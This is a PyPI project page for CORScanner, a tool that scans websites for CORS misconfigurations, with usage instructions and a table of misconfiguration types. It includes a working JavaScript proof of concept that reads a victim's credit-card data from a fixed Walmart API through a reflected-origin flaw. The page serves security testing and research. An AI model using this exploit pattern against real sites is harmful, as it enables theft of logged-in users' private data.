Skip to main content

Fast CORS misconfiguration vulnerabilities scanner

Project description

About CORScanner

CORScanner is a python tool designed to discover CORS misconfigurations vulnerabilities of websites. It helps website administrators and penetration testers to check whether the domains/urls they are targeting have insecure CORS policies.

Features

  • Fast. It uses gevent instead of Python threads for concurrency, which is much faster for network scanning.
  • Comprehensive. It covers all the common types of CORS misconfigurations we know.
  • Flexible. It supports various self-define features (e.g. file output), which is helpful for large-scale scanning.
  • 🆕 CORScanner supports installation via pip (pip install corscanner or pip install cors)
  • 🆕 CORScanner can be used as a library in your project.

Two useful references for understanding CORS systematically:

Please consider citing our paper if you do scentific research (Click me).

Latex version:

@inproceedings{chen-cors,
author = {Jianjun Chen and Jian Jiang and Haixin Duan and Tao Wan and Shuo Chen and Vern Paxson and Min Yang},
title = {We Still Don{\textquoteright}t Have Secure Cross-Domain Requests: an Empirical Study of {CORS}},
booktitle = {27th {USENIX} Security Symposium ({USENIX} Security 18)},
year = {2018},
isbn = {978-1-939133-04-5},
address = {Baltimore, MD},
pages = {1079--1093},
url = {https://www.usenix.org/conference/usenixsecurity18/presentation/chen-jianjun},
publisher = {{USENIX} Association},
month = aug,
}

Word version:

Jianjun Chen, Jian Jiang, Haixin Duan, Tao Wan, Shuo Chen, Vern Paxson, and Min Yang. "We Still Don’t Have Secure Cross-Domain Requests: an Empirical Study of CORS." In 27th USENIX Security Symposium (USENIX Security 18), pp. 1079-1093. 2018.

Screenshots

CORScanner

Installation

  • Download this tool
git clone https://github.com/chenjj/CORScanner.git
  • Install dependencies
sudo pip install -r requirements.txt

CORScanner depends on the requests, gevent, tldextract, colorama and argparse python modules.

Python Version:

  • Both Python 2 (2.7.x) and Python 3 (3.7.x) are supported.

CORScanner as a library

  • Install CORScanner via pip
sudo pip install corscanner

or use the short name:

sudo pip install cors
  • Example code:
>>> from CORScanner.cors_scan import cors_check
>>> ret = cors_check("https://www.instagram.com", None)
>>> ret
{'url': 'https://www.instagram.com', 'type': 'reflect_origin', 'credentials': 'false', 'origin': 'https://evil.com', 'status_code': 200}

You can also use CORScanner via the corscanner or cors command: corscanner -vu https://www.instagram.com

Usage

Short Form Long Form Description
-u --url URL/domain to check it's CORS policy
-d --headers Add headers to the request
-i --input URL/domain list file to check their CORS policy
-t --threads Number of threads to use for CORS scan
-o --output Save the results to json file
-v --verbose Enable the verbose mode and display results in realtime
-T --timeout Set requests timeout (default 10 sec)
-p --proxy Enable proxy (http or socks5)
-h --help show the help message and exit

Examples

  • To check CORS misconfigurations of specific domain:

python cors_scan.py -u example.com

  • To enable more debug info, use -v:

python cors_scan.py -u example.com -v

  • To save scan results to a JSON file, use -o:

python cors_scan.py -u example.com -o output_filename

  • To check CORS misconfigurations of specific URL:

python cors_scan.py -u http://example.com/restapi

  • To check CORS misconfiguration with specific headers:

python cors_scan.py -u example.com -d "Cookie: test"

  • To check CORS misconfigurations of multiple domains/URLs:

python cors_scan.py -i top_100_domains.txt -t 100

  • To enable proxy for CORScanner, use -p

python cors_scan.py -u example.com -p http://127.0.0.1:8080

To use socks5 proxy, install PySocks with pip install PySocks

python cors_scan.py -u example.com -p socks5://127.0.0.1:8080

  • To list all the basic options and switches use -h switch:

python cors_scan.py -h

Misconfiguration types

This tool covers the following misconfiguration types:

Misconfiguration type Description
Reflect_any_origin Blindly reflect the Origin header value in Access-Control-Allow-Origin headers in responses, which means any website can read its secrets by sending cross-orign requests.
Prefix_match wwww.example.com trusts example.com.evil.com, which is an attacker's domain.
Suffix_match wwww.example.com trusts evilexample.com, which could be registered by an attacker.
Not_escape_dot wwww.example.com trusts wwwaexample.com, which could be registered by an attacker.
Substring match wwww.example.com trusts example.co, which could be registered by an attacker.
Trust_null wwww.example.com trusts null, which can be forged by iframe sandbox scripts
HTTPS_trust_HTTP Risky trust dependency, a MITM attacker may steal HTTPS site secrets
Trust_any_subdomain Risky trust dependency, a subdomain XSS may steal its secrets
Custom_third_parties Custom unsafe third parties origins like github.io, see more in origins.json file. Thanks @phackt!
Special_characters_bypass Exploiting browsers’ handling of special characters. Most can only work in Safari except _, which can also work in Chrome and Firefox. See more in Advanced CORS Exploitation Techniques. Thanks @Malayke.

Welcome to contribute more.

Exploitation examples

Here is an example about how to exploit "Reflect_any_origin" misconfiguration on Walmart.com(fixed). Localhost is the malicious website in the video.

Walmart.com video on Youtube:

Walmart_CORS_misconfiguration_exploitation

Here is the exploitation code:

<script>
    // Send a cross origin request to the walmart.com server, when a victim visits the page.
    var req = new XMLHttpRequest();
    req.open('GET',"https://www.walmart.com/account/electrode/account/api/customer/:CID/credit-card",true);
    req.onload = stealData;
    req.withCredentials = true;
    req.send();

    function stealData(){
        //reading response is allowed because of the CORS misconfiguration.
        var data= JSON.stringify(JSON.parse(this.responseText),null,2);

        //display the data on the page. A real attacker can send the data to his server.
        output(data);
    }

    function output(inp) {
        document.body.appendChild(document.createElement('pre')).innerHTML = inp;
    }
</script>

If you have understood how the demo works, you can read Section 5 and Section 6 of the CORS paper and know how to exploit other misconfigurations.

License

CORScanner is licensed under the MIT license. take a look at the LICENSE for more information.

Credits

This work is inspired by the following excellent researches:

  • James Kettle, “Exploiting CORS misconfigurations for Bitcoins and bounties”, AppSecUSA 2016*
  • Evan Johnson, “Misconfigured CORS and why web appsec is not getting easier”, AppSecUSA 2016*
  • Von Jens Müller, "CORS misconfigurations on a large scale", CORStest*

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

cors-1.0.1.tar.gz (2.3 MB view details)

Uploaded Source

Built Distribution

cors-1.0.1-py3-none-any.whl (2.3 MB view details)

Uploaded Python 3

File details

Details for the file cors-1.0.1.tar.gz.

File metadata

  • Download URL: cors-1.0.1.tar.gz
  • Upload date:
  • Size: 2.3 MB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.4.1 importlib_metadata/3.10.0 pkginfo/1.7.0 requests/2.25.1 requests-toolbelt/0.9.1 tqdm/4.60.0 CPython/3.9.4

File hashes

Hashes for cors-1.0.1.tar.gz
Algorithm Hash digest
SHA256 6a337e54978ea0d1527d2d918d5bdb5771a0f4904ecc6706541717bf15184236
MD5 7a9ceb145106acd73c0ce6ce97cc0ed8
BLAKE2b-256 ef74a7913a710ef4ecce19dd091168dd0e21d7705587d3f2d4eac0e502bb3a75

See more details on using hashes here.

File details

Details for the file cors-1.0.1-py3-none-any.whl.

File metadata

  • Download URL: cors-1.0.1-py3-none-any.whl
  • Upload date:
  • Size: 2.3 MB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.4.1 importlib_metadata/3.10.0 pkginfo/1.7.0 requests/2.25.1 requests-toolbelt/0.9.1 tqdm/4.60.0 CPython/3.9.4

File hashes

Hashes for cors-1.0.1-py3-none-any.whl
Algorithm Hash digest
SHA256 cd2e2081b3a560d6a4abde5691d32f2305c49caa757b2147c929f1e64ca90398
MD5 7833a6f950167fb27ae7d9f4c11ca471
BLAKE2b-256 eaacf1fed378be23b23cd959b2d52b64c01e9911dd28a378c1a9aaaea87bb1ab

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page